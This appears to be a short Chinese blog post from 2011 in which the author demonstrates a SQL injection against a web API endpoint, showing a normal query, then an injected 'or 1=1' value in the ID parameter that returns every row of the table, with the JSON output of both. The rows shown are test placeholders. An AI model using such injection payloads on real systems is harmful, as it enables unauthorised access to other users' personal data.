格式化字符串入侵

Posted by Sir0xb on 2011-10-21 08:54:51 +0800

今日无聊测试了下数据库接口。

URL:...getInfoList?ID=1&GroupId=3

获得的数据是:

[{"ID":1,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"f1","C_NICKNAME":"ff1","C_EMAIL":"[email protected]","C_MOBILE":"13800000000","C_TEL":"80000000","C_HOME_ADD":"asdfsadf","C_COM_ADD":"asdfasdf"},
{"ID":2,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"f2","C_NICKNAME":"ff2","C_EMAIL":"[email protected]","C_MOBILE":"13900000000","C_TEL":"90000000","C_HOME_ADD":"fgsdfg","C_COM_ADD":"fsgfdg"},
{"ID":58,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"Test","C_NICKNAME":"Test","C_EMAIL":"[email protected]","C_MOBILE":"Test","C_TEL":"Test","C_HOME_ADD":"Test","C_COM_ADD":"Test"},
{"ID":62,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"QQ","C_NICKNAME":"QQ","C_EMAIL":"[email protected]","C_MOBILE":"QQ","C_TEL":"QQ","C_HOME_ADD":"QQ","C_COM_ADD":"QQ"},
{"ID":66,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"KK","C_NICKNAME":"KK","C_EMAIL":"KK","C_MOBILE":"KK","C_TEL":"KK","C_HOME_ADD":"KK","C_COM_ADD":"KK"}]

构造了一个特殊字符串赋予ID,结果把数据库同一张表的所有信息全部读出。

URL: ...getInfoList?ID=1||''' or 1=1 or t.userinfo_id = '''||1&GroupId=3

获得的数据是:

[{"ID":1,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"f1","C_NICKNAME":"ff1","C_EMAIL":"[email protected]","C_MOBILE":"13800000000","C_TEL":"80000000","C_HOME_ADD":"asdfsadf","C_COM_ADD":"asdfasdf"},
{"ID":2,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"f2","C_NICKNAME":"ff2","C_EMAIL":"[email protected]","C_MOBILE":"13900000000","C_TEL":"90000000","C_HOME_ADD":"fgsdfg","C_COM_ADD":"fsgfdg"},
{"ID":58,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"Test","C_NICKNAME":"Test","C_EMAIL":"[email protected]","C_MOBILE":"Test","C_TEL":"Test","C_HOME_ADD":"Test","C_COM_ADD":"Test"},
{"ID":59,"USERINFO_ID":1,"USER_GROUP":37,"C_NAME":"Test","C_NICKNAME":"Test","C_EMAIL":"[email protected]","C_MOBILE":"Test","C_TEL":"Test","C_HOME_ADD":"Test","C_COM_ADD":"Test"},
{"ID":60,"USERINFO_ID":1,"USER_GROUP":55,"C_NAME":"Test","C_NICKNAME":"Test","C_EMAIL":"[email protected]","C_MOBILE":"Test","C_TEL":"Test","C_HOME_ADD":"Test","C_COM_ADD":"Test"},
{"ID":61,"USERINFO_ID":1,"USER_GROUP":38,"C_NAME":"Test","C_NICKNAME":"Test","C_EMAIL":"[email protected]","C_MOBILE":"Test","C_TEL":"Test","C_HOME_ADD":"Test","C_COM_ADD":"Test"},
{"ID":62,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"QQ","C_NICKNAME":"QQ","C_EMAIL":"[email protected]","C_MOBILE":"QQ","C_TEL":"QQ","C_HOME_ADD":"QQ","C_COM_ADD":"QQ"},
{"ID":63,"USERINFO_ID":1,"USER_GROUP":37,"C_NAME":"QQ","C_NICKNAME":"QQ","C_EMAIL":"[email protected]","C_MOBILE":"QQ","C_TEL":"QQ","C_HOME_ADD":"QQ","C_COM_ADD":"QQ"},
{"ID":64,"USERINFO_ID":1,"USER_GROUP":38,"C_NAME":"QQ","C_NICKNAME":"QQ","C_EMAIL":"[email protected]","C_MOBILE":"QQ","C_TEL":"QQ","C_HOME_ADD":"QQ","C_COM_ADD":"QQ"},
{"ID":65,"USERINFO_ID":1,"USER_GROUP":55,"C_NAME":"QQ","C_NICKNAME":"QQ","C_EMAIL":"[email protected]","C_MOBILE":"QQ","C_TEL":"QQ","C_HOME_ADD":"QQ","C_COM_ADD":"QQ"},
{"ID":66,"USERINFO_ID":1,"USER_GROUP":3,"C_NAME":"KK","C_NICKNAME":"KK","C_EMAIL":"KK","C_MOBILE":"KK","C_TEL":"KK","C_HOME_ADD":"KK","C_COM_ADD":"KK"},
{"ID":67,"USERINFO_ID":1,"USER_GROUP":55,"C_NAME":"KK","C_NICKNAME":"KK","C_EMAIL":"KK","C_MOBILE":"KK","C_TEL":"KK","C_HOME_ADD":"KK","C_COM_ADD":"KK"},
{"ID":68,"USERINFO_ID":1,"USER_GROUP":55,"C_NAME":"POPO","C_NICKNAME":"POPO","C_EMAIL":"POPO","C_MOBILE":"POPO","C_TEL":"POPO","C_HOME_ADD":"POPO","C_COM_ADD":"POPO"},
{"ID":69,"USERINFO_ID":1,"USER_GROUP":37,"C_NAME":"POPO","C_NICKNAME":"POPO","C_EMAIL":"POPO","C_MOBILE":"POPO","C_TEL":"POPO","C_HOME_ADD":"POPO","C_COM_ADD":"POPO"},
{"ID":70,"USERINFO_ID":1,"USER_GROUP":38,"C_NAME":"POPO","C_NICKNAME":"POPO","C_EMAIL":"POPO","C_MOBILE":"POPO","C_TEL":"POPO","C_HOME_ADD":"POPO","C_COM_ADD":"POPO"},
{"ID":71,"USERINFO_ID":1,"USER_GROUP":55,"C_NAME":"POPO","C_NICKNAME":"POPO","C_EMAIL":"POPO","C_MOBILE":"POPO","C_TEL":"POPO","C_HOME_ADD":"POPO","C_COM_ADD":"POPO"},
{"ID":72,"USERINFO_ID":1,"USER_GROUP":37,"C_NAME":"POPO","C_NICKNAME":"POPO","C_EMAIL":"POPO","C_MOBILE":"POPO","C_TEL":"POPO","C_HOME_ADD":"POPO","C_COM_ADD":"POPO"}